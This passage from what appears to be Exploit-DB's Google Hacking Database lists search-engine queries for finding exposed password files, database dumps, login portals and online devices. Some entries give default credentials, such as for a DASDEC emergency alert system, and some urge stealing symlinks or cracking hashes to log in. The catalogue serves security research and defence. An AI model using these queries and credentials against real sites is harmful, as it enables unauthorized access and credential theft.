"inurl:\"/dbman/default.pass\"", "textualDescription": "A path to a DES encrypted password for DBMan (\nhttp://www.gossamer-threads.com/products/archive.html) ranging from Guest\nto Admin account, this is often found coupled with cgi-telnet.pl (\nhttp://www.rohitab.com/cgi-telnet) which provides an admin login, by\ndefault and the password provided by DBMan's path /dbman/default.pass\n\n\nI have already posted this to packetstorm on June 7th 2004, called\ncgitelnetdbman (\nhttp://packetstormsecurity.org/files/29530/cgitelnetdbman.pdf.html)\n\nThe 'Dork' is *inurl:\"/dbman/default.pass\" *\n\n\n\nLawrence Lavigne (ratdance)\n-suidrewt" }, { "signatureReferenceNumber": "3818", "link": "https://www.exploit-db.com/ghdb/3818/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"InfoViewApp/logon.jsp\"", "shortDescription": "inurl:\"InfoViewApp/logon.jsp\"", "textualDescription": "Google Hacking\n\n*SAP Business Object 3.1 XI*\n\ninurl:\"InfoViewApp/logon.jsp\"\n\ntwitter\n@firebitsbr" }, { "signatureReferenceNumber": "3819", "link": "https://www.exploit-db.com/ghdb/3819/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:phpliteadmin.php", "shortDescription": "inurl:phpliteadmin.php", "textualDescription": "The default password is 'admin'" }, { "signatureReferenceNumber": "3820", "link": "https://www.exploit-db.com/ghdb/3820/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "shortDescription": "inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "textualDescription": "Hello,\n\nEnumerate Solarwinds Orion network monitoring portals. In some cases, the\nportal can be accessed without authenticating.\n\n-Sean" }, { "signatureReferenceNumber": "3821", "link": "https://www.exploit-db.com/ghdb/3821/", "category": "Files containing passwords", "querystring": "https://www.google.com/search?q=allinurl%3A\"User_info%2Fauth_user_file.txt\"", "shortDescription": "allinurl:\"User_info/auth_user_file.txt\"", "textualDescription": "Google dork for find user info and configuration password of DCForum\nallinurl:\"User_info/auth_user_file.txt\"\n\n- Ajith Kp" }, { "signatureReferenceNumber": "3822", "link": "https://www.exploit-db.com/ghdb/3822/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intext:\"Fatal error: Class 'Red_Action' not found in\"", "shortDescription": "intext:\"Fatal error: Class 'Red_Action' not found in\"", "textualDescription": "Dork to find Plugin errors in wordpress websites\nDork - intext:\"Fatal error: Class 'Red_Action' not found in\"" }, { "signatureReferenceNumber": "3823", "link": "https://www.exploit-db.com/ghdb/3823/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=Google dork inurl:newsnab/www/ automated.config.php", "shortDescription": "inurl:newsnab/www/ automated.config.php", "textualDescription": "Usenet Accounts from Newsnab configs\ninurl:newsnab/www/ automated.config.php\nAuthor: rmccurdy.com\n\nyay free newsgroup access !\n***********************************************************************\nThe information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter.\n***********************************************************************" }, { "signatureReferenceNumber": "3824", "link": "https://www.exploit-db.com/ghdb/3824/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "shortDescription": "inurl:admin intext:username= AND email= AND password= OR pass= filetype:xls", "textualDescription": "-- \nnitish mehta" }, { "signatureReferenceNumber": "3825", "link": "https://www.exploit-db.com/ghdb/3825/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost", "shortDescription": "you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost", "textualDescription": "Gives sites with default username root and no password\n-- \nnitish mehta" }, { "signatureReferenceNumber": "3826", "link": "https://www.exploit-db.com/ghdb/3826/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intext:SQL syntax & inurl:index.php?=id & inurl:gov & inurl:gov", "shortDescription": "intext:SQL syntax & inurl:index.php?=id & inurl:gov & inurl:gov", "textualDescription": "# Exploit Title: SQLI Exploit\n# Google Dork: intext:SQL syntax & inurl:index.php?=id & inurl:gov &\ninurl:gov\n# Date: 25/December/2012\n# Exploit Author: BeastarStealacar\n# Vendor Homepage: http://devil-zone.net/" }, { "signatureReferenceNumber": "3827", "link": "https://www.exploit-db.com/ghdb/3827/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:/wp-content/w3tc/dbcache/", "shortDescription": "inurl:/wp-content/w3tc/dbcache/", "textualDescription": "- Jay Townsend" }, { "signatureReferenceNumber": "3828", "link": "https://www.exploit-db.com/ghdb/3828/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=runtimevar softwareVersion=", "shortDescription": "runtimevar softwareVersion=", "textualDescription": "Hits: 807\nConfig file from Thomson home routers, sometimes it contains password's and\nuser's encrypted\nContains ACS servers info from ISP's" }, { "signatureReferenceNumber": "3829", "link": "https://www.exploit-db.com/ghdb/3829/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=site:login.*.*", "shortDescription": "site:login.*.*", "textualDescription": "DORK:site:login.*.*\nDescription: Allow User To View\nLogin Panel Of Many WebSites..\nAuthor:MTK\nDATED: 13-1-1" }, { "signatureReferenceNumber": "3830", "link": "https://www.exploit-db.com/ghdb/3830/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/control/userimage.html", "shortDescription": "inurl:/control/userimage.html", "textualDescription": "Mobotix webcam search. yet another newer search" }, { "signatureReferenceNumber": "3831", "link": "https://www.exploit-db.com/ghdb/3831/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:xml (\"proto='prpl-'\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "shortDescription": "ext:xml (\"proto='prpl-'\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "textualDescription": "*Google Search:*\n\nhttps://www.google.com/search?q=ext:xml%20(%22proto='prpl-'%22%20|%20%22prpl-yahoo%22%20|%20%22prpl-silc%22%20|%20%22prpl-icq%22) \n\n\n*Description:*\n\nFind Accounds and Passwords from Pidgin Users.\nGoogle limit queries to 32 words so it?s impossible to search for all \nAccount-Types in one query!\nList of all Params: Feel free to build your own search query.\nproto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour; \nprpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn; \nprpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah; \nprpl-irc; prpl-yabber\n\n*Author:* la.usch.io" }, { "signatureReferenceNumber": "3832", "link": "https://www.exploit-db.com/ghdb/3832/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:gnucash", "shortDescription": "ext:gnucash", "textualDescription": "*Google Search:*\n\nhttp://www.google.com/search?q=ext:gnucash\n\n*Description:*\n\nFind Gnucash Databases containing juicy info.\n\n*Author:*\n\nhttp://la.usch.io\nhttps://www.twitter.com/la_usch\n\n--------------------------------------------------------\n\nCheers\n\nL@usch\nWeb: http://la.usch.io\nTwitter: https://www.twitter.com/la_usch" }, { "signatureReferenceNumber": "3833", "link": "https://www.exploit-db.com/ghdb/3833/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "shortDescription": "filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "textualDescription": "Aggregates previous mysql_(p)connect google dorks and adds a new filetype.\nSearches common file extensions used as backups by PHP developers. These\nextensions are normally not interpreted as code by their server, so their\ndatabase connection credentials can be viewed in plaintext.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3834", "link": "https://www.exploit-db.com/ghdb/3834/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:config inurl:web.config inurl:ftp", "shortDescription": "filetype:config inurl:web.config inurl:ftp", "textualDescription": "This google dork to find sensitive information of MySqlServer , \"uid, and\npassword\" in web.config through ftp..\nfiletype:config inurl:web.config inurl:ftp\n\n-Altamimi" }, { "signatureReferenceNumber": "3835", "link": "https://www.exploit-db.com/ghdb/3835/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "shortDescription": "allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "textualDescription": "Reported by: Jasper Briels" }, { "signatureReferenceNumber": "3836", "link": "https://www.exploit-db.com/ghdb/3836/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=\"index of\" inurl:root intitle:symlink", "shortDescription": "\"index of\" inurl:root intitle:symlink", "textualDescription": "Google Dork: index of\" inurl:root intitle:symlink\n\nSteal Others Symlink\n\nAuthor: Un0wn_X" }, { "signatureReferenceNumber": "3837", "link": "https://www.exploit-db.com/ghdb/3837/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=\"index of\" inurl:sym", "shortDescription": "\"index of\" inurl:sym", "textualDescription": "Google Dork: \"index of\" inurl:sym\n\nYou can Steal the symlinks of other Servers\n\nAuthor: Un0wn_X" }, { "signatureReferenceNumber": "3838", "link": "https://www.exploit-db.com/ghdb/3838/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"php?id=\" intext:\"DB_Error Object \"", "shortDescription": "inurl:\"php?id=\" intext:\"DB_Error Object \"", "textualDescription": "Description: Files containing juicy info\nAuthor:ruben_linux" }, { "signatureReferenceNumber": "3839", "link": "https://www.exploit-db.com/ghdb/3839/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:sql intext:@hotmail.com intext :password", "shortDescription": "ext:sql intext:@hotmail.com intext :password", "textualDescription": "By ,\nNItish Mehta ,\nwww.illuminativeworks.com/blog\nhttps://www.facebook.com/illuminativeworks\nIlluminative Works(CEO & Founder )" }, { "signatureReferenceNumber": "3840", "link": "https://www.exploit-db.com/ghdb/3840/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:advsearch.php?module= & intext:sql syntax", "shortDescription": "inurl:advsearch.php?module= & intext:sql syntax", "textualDescription": "Exploit Title : SQLI Exploit\nGoogle Dork : inurl:advsearch.php?module= & intext:sql syntax\nDate : 19/3/2013\nExploit Author : Scott Sturrock\nEmail : f00bar'at'linuxmail'dot'org" }, { "signatureReferenceNumber": "3841", "link": "https://www.exploit-db.com/ghdb/3841/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "shortDescription": "intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx", "textualDescription": "Category : Pages containing login portals\nDescription : Dork for finding sensitive login portals\nDork : intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&oq=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&gs_l=hp.3...852.852.0.983.1.1.0.0.0.0.121.121.0j1.1.0...0.0...1c.1.7.psy-ab.664iAsY450k&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nExploit Author: Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org" }, { "signatureReferenceNumber": "3842", "link": "https://www.exploit-db.com/ghdb/3842/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "shortDescription": "intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx", "textualDescription": "Category : Pages containing login portals\nDescription : Dork for finding government login portals\nDork : intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&oq=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&gs_l=hp.3...894.894.0.1059.1.1.0.0.0.0.116.116.0j1.1.0...0.0...1c.1.7.psy-ab.lvawmQ4rKqA&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.d2k&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nAuthor : Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org" }, { "signatureReferenceNumber": "3843", "link": "https://www.exploit-db.com/ghdb/3843/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:Computer Misuse Act inurl:login.aspx", "shortDescription": "intext:Computer Misuse Act inurl:login.aspx", "textualDescription": "Category : Pages containing login portals\nDescription : Dork for finding sensitive login portals\nDork : intext:Computer Misuse Act inurl:login.aspx\nLink : https://encrypted.google.com/#hl=en&output=search&sclient=psy-ab&q=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&oq=intext:Computer+Misuse+Act+inurl%3Alogin.aspx&gs_l=hp.3...1565.1565.0.1684.1.1.0.0.0.0.105.105.0j1.1.0...0.0...1c.1.7.psy-ab.ZaZN16Ureds&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44011176,d.ZWU&fp=7b93b16efbccc178&biw=1362&bih=667 \nDate : 20/3/2013\nAuthor : Scott Sturrock\nEmail: f00bar'at'linuxmail'dot'org" }, { "signatureReferenceNumber": "3844", "link": "https://www.exploit-db.com/ghdb/3844/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:ini \"This is the default settings file for new PHP installations\"", "shortDescription": "filetype:ini \"This is the default settings file for new PHP installations\"", "textualDescription": "Finds PHP configuration files (php.ini) that have been placed in indexed\nfolders. Php.ini defines a PHP installation's behavior, including magic\nquotes, register globals, and remote file operations. This can be useful\nfor knowing which attacks (such as RFI) are possible against the server.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3845", "link": "https://www.exploit-db.com/ghdb/3845/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "shortDescription": "filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "textualDescription": "Tries to reduce false positive results from similar dorks. Finds pages\ncontaining output from phpinfo(). This function is used to debug and test\nPHP installations by listing versions, extensions, configurations, server\ninformation, file system information, and execution environment. The output\nof this function should not be included in production environments and\ncertain versions of this function are vulnerable to reflected XSS attacks.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3846", "link": "https://www.exploit-db.com/ghdb/3846/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/voice/advanced/ intitle:Linksys SPA configuration", "shortDescription": "inurl:/voice/advanced/ intitle:Linksys SPA configuration", "textualDescription": "This allows you to look at linksys VOIP Router Config pages." }, { "signatureReferenceNumber": "3847", "link": "https://www.exploit-db.com/ghdb/3847/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?q=inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "shortDescription": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"", "textualDescription": "inurl:\"/root/etc/passwd\" intext:\"home/*:\"" }, { "signatureReferenceNumber": "3848", "link": "https://www.exploit-db.com/ghdb/3848/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?q=intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "shortDescription": "intext:\"root:x:0:0:root:/root:/bin/bash\" inurl:*=/etc/passwd", "textualDescription": "Author: ./tic0 | Izzudin al-Qassam Cyber Fighter" }, { "signatureReferenceNumber": "3849", "link": "https://www.exploit-db.com/ghdb/3849/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:sql insite:pass && user", "shortDescription": "filetype:sql insite:pass && user", "textualDescription": "Google Dork: filetype:sql insite:pass && user\n\nWe Can get login username and password details from .sql file.\n\nAuthor: BlacK_WooD" }, { "signatureReferenceNumber": "3850", "link": "https://www.exploit-db.com/ghdb/3850/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.", "shortDescription": "Serv-U (c) Copyright 1995-2013 Rhino Software, Inc. All Rights.Reserved.", "textualDescription": "# Category: FTP Login Portals\n# Description : Dork for finding FTP Login portals\n# Google Dork: Serv-U \ufffd Copyright 1995-2013 Rhino Software, Inc. All\nRights.Reserved.\n# Date: 16/04/2013\n# Exploit Author: Arul Kumar.V\n# Vendor Homepage: www.serv-u.com\n# Email : hackerarul@gmail.com\n\n\nThank you" }, { "signatureReferenceNumber": "3852", "link": "https://www.exploit-db.com/ghdb/3852/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allintext: /iissamples/default/", "shortDescription": "allintext: /iissamples/default/", "textualDescription": "Searching for \"allintext: /iissamples/default/\" may provide interesting\ninformation about a mis-configured .asp server including raw source code\nfor asp, directory structure and the IIS version ( especially useful when\nIIS is running on NT 4.0)\n\nthe result provides a way to further explore directory structure for juicy\ninfo.\n\nOleg." }, { "signatureReferenceNumber": "3853", "link": "https://www.exploit-db.com/ghdb/3853/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"VNC Viewer for Java\"", "shortDescription": "intitle:\"VNC Viewer for Java\"", "textualDescription": "VNC Viewer for Java\n\n~4N6 Security~" }, { "signatureReferenceNumber": "3854", "link": "https://www.exploit-db.com/ghdb/3854/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "shortDescription": "inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "textualDescription": "zendesk is good ticketing system . It has thousands of clients. with the\nabove dork you can see the clients internal file attachments of the\ntickets .\n\nThese file can be opened by anyone because they are not maintaining any\nauthentication token for this attachments\n\nInternal source codes, doubts, ip's , passwords, can be disclosed in the\nattachments" }, { "signatureReferenceNumber": "3855", "link": "https://www.exploit-db.com/ghdb/3855/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"dasdec/dasdec.csp\"", "shortDescription": "inurl:\"dasdec/dasdec.csp\"", "textualDescription": "inurl:\"dasdec/dasdec.csp\"\nDASDEC II Emergency Alert System\nUser Manual: http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdf\nDefault username: Admin\nDefault password: dasdec" }, { "signatureReferenceNumber": "3856", "link": "https://www.exploit-db.com/ghdb/3856/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=\"information_schema\" filetype:sql", "shortDescription": "\"information_schema\" filetype:sql", "textualDescription": "Dork: \"information_schema\" filetype:sql\n\n\nBy: Cr4t3r" }, { "signatureReferenceNumber": "3857", "link": "https://www.exploit-db.com/ghdb/3857/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "shortDescription": "intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "textualDescription": "# Exploit Title: google dork for apache directory listing by url edit\n# Google Dork: intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1\n in this query you see that text file but by url we can travel in paren directory \n# Date: 11/7/2013\n# Exploit Author: james love india\n# Tested on: windows xp sp2" }, { "signatureReferenceNumber": "3858", "link": "https://www.exploit-db.com/ghdb/3858/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of intext:.bash_history", "shortDescription": "intitle:index.of intext:.bash_history", "textualDescription": "the GHDB on subject (intitle:index.of intext:.bash_history) finds all\nhome users directory path indexed. I've test it and google return 943\nresults!\n\n-Andrea Menin" }, { "signatureReferenceNumber": "3859", "link": "https://www.exploit-db.com/ghdb/3859/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Cisco Integrated Management Controller Login\"", "shortDescription": "intitle:\"Cisco Integrated Management Controller Login\"", "textualDescription": "intitle:\"Cisco Integrated Management Controller Login\"\n\nThe Cisco Integrated Management Controller (CIMC) is the management service\nfor the C-Series servers. CIMC is built into the motherboard. This Google\ndork searches for the CIMC GUI login portal for remote access.\n\nax_" }, { "signatureReferenceNumber": "3860", "link": "https://www.exploit-db.com/ghdb/3860/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "shortDescription": "inurl:/secure/Dashboard.jspa intitle:\"System Dashboard\"", "textualDescription": "Finds login pages and system dashboards for Atlassian's JIRA.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3861", "link": "https://www.exploit-db.com/ghdb/3861/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "shortDescription": "\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "textualDescription": "Finds cPanel login pages.\n\n- Andy G - twitter.com/vxhex" }, { "signatureReferenceNumber": "3862", "link": "https://www.exploit-db.com/ghdb/3862/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "shortDescription": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "textualDescription": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin\n\nview phpMyAdmin of web sites\n\nAuthor: Un0wn_X\nFollow: @UnownSec\nE-Mail: unownsec@gmail.com" }, { "signatureReferenceNumber": "3863", "link": "https://www.exploit-db.com/ghdb/3863/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:fluidgalleries/dat/login.dat", "shortDescription": "inurl:fluidgalleries/dat/login.dat", "textualDescription": "Works with every single fluidgalleries portofolio sites. Just decrypt the MD5 hash and login onto url.extension/admin.php with the username from the search result and with the decrypted MD5 hash. Dork by Kraze (kraze@programmer.net)" }, { "signatureReferenceNumber": "3864", "link": "https://www.exploit-db.com/ghdb/3864/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:5000/webman/index.cgi", "shortDescription": "inurl:5000/webman/index.cgi", "textualDescription": "Synology nas login" }, { "signatureReferenceNumber": "3865", "link": "https://www.exploit-db.com/ghdb/3865/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:wp-content/uploads/dump.sql", "shortDescription": "inurl:wp-content/uploads/dump.sql", "textualDescription": "This is *Mohan Pendyala* (penetration tester) from india.\n\nGoogle Dork: *inurl:wp-content/uploads/dump.sql*\n*\n*\nThe *Dump.sql* file reveals total info about the database tables, Users,\npasswords..etc" }, { "signatureReferenceNumber": "3866", "link": "https://www.exploit-db.com/ghdb/3866/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Internet Security Appliance\" & intext:\"Enter Password and click Login\"", "shortDescription": "intitle:\"Internet Security Appliance\" & intext:\"Enter Password and click Login\"", "textualDescription": "#Summary: ZyWall Firewall login portal\n#Category: Various Online Devices\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3867", "link": "https://www.exploit-db.com/ghdb/3867/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl:1337w0rm.php intitle:1337w0rm", "shortDescription": "inurl:1337w0rm.php intitle:1337w0rm", "textualDescription": "Finds websites that have 1337w0rm's CPanel cracker uploaded.\nSince the Cracker is relatively new, some sites might not use it. \n\n-TehMysticaL" }, { "signatureReferenceNumber": "3868", "link": "https://www.exploit-db.com/ghdb/3868/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\".:: Welcome to the Web-Based Configurator::.\" & intext:\"Welcome to your router Configuration Interface\"", "shortDescription": "intitle:\".:: Welcome to the Web-Based Configurator::.\" & intext:\"Welcome to your router Configuration Interface\"", "textualDescription": "#Summary: ZyXEL router login portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7\n\nNOTE:\ncurrently exists this -> http://www.exploit-db.com/ghdb/270/ but only shows\n8 results against 63100 that i sent, also covers more models." }, { "signatureReferenceNumber": "3869", "link": "https://www.exploit-db.com/ghdb/3869/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:\"I'm using a public or shared computer\" & intext:\"Remote Web Workplace\"", "shortDescription": "intext:\"I'm using a public or shared computer\" & intext:\"Remote Web Workplace\"", "textualDescription": "#Summary: Windows Business Server 2003 Login portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3870", "link": "https://www.exploit-db.com/ghdb/3870/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"/secure/login.aspx\"", "shortDescription": "inurl:\"/secure/login.aspx\"", "textualDescription": "#Summary: Several Web Pages Login Portal\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3871", "link": "https://www.exploit-db.com/ghdb/3871/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"Weather Wing WS-2\"", "shortDescription": "intitle:\"Weather Wing WS-2\"", "textualDescription": "#Summary:Weather Wing (http://www.meteo-system.com/ws2.php) Portal.\n#Category: Various Online Divices\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3872", "link": "https://www.exploit-db.com/ghdb/3872/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"NetBotz Network Monitoring Appliance\"", "shortDescription": "intitle:\"NetBotz Network Monitoring Appliance\"", "textualDescription": "#Summary:Various Online Divices\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3873", "link": "https://www.exploit-db.com/ghdb/3873/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"Transponder/EOL Configuration:\" inurl:asp", "shortDescription": "intitle:\"Transponder/EOL Configuration:\" inurl:asp", "textualDescription": "#Summary: Cheeta Technologies Transponder Configuration Portal (*\nhttp://www.cheetahtech.com).*\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3874", "link": "https://www.exploit-db.com/ghdb/3874/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:\"WAMPSERVER Homepage\" & intext:\"Server Configuration\"", "shortDescription": "intitle:\"WAMPSERVER Homepage\" & intext:\"Server Configuration\"", "textualDescription": "#Summary: Wampserver Homepage free access (*http://www.wampserver.com/).*\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3875", "link": "https://www.exploit-db.com/ghdb/3875/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"Web Image Monitor\" & inurl:\"/mainFrame.cgi\"", "shortDescription": "intitle:\"Web Image Monitor\" & inurl:\"/mainFrame.cgi\"", "textualDescription": "#Summary: Several printers that use \"Web Image Monitor\" control panel (\nhttp://ricoh.pbworks.com/w/page/14063393/CSWebImageMonitor). Used default\nby Ricoh, Lanier and others.\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3876", "link": "https://www.exploit-db.com/ghdb/3876/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:8080 intitle:\"Dashboard [Jenkins]\"", "shortDescription": "inurl:8080 intitle:\"Dashboard [Jenkins]\"", "textualDescription": "#Summary: Acces to Jenkins Dashboard\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3877", "link": "https://www.exploit-db.com/ghdb/3877/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Login - OTRS\" inurl:pl", "shortDescription": "intitle:\"Login - OTRS\" inurl:pl", "textualDescription": "#Summary: OTRS login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3878", "link": "https://www.exploit-db.com/ghdb/3878/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"WebMail | Powered by Winmail Server - Login\" & (intext:\"Username\" & intext:\"Password\")", "shortDescription": "intitle:\"WebMail | Powered by Winmail Server - Login\" & (intext:\"Username\" & intext:\"Password\")", "textualDescription": "#Summary: Winmail login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3879", "link": "https://www.exploit-db.com/ghdb/3879/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "shortDescription": "inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "textualDescription": "#Summary: VoIP login portals\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3880", "link": "https://www.exploit-db.com/ghdb/3880/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"::: Login :::\" & intext:\"Customer Login\" & \"Any time & Any where\"", "shortDescription": "intitle:\"::: Login :::\" & intext:\"Customer Login\" & \"Any time & Any where\"", "textualDescription": "#Summary: Surveillance login portals\n#Author: g00gl3 5c0u7" }, { "signatureReferenceNumber": "3881", "link": "https://www.exploit-db.com/ghdb/3881/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:phpmyadmin/index.php & (intext:username & password & \"Welcome to\")", "shortDescription": 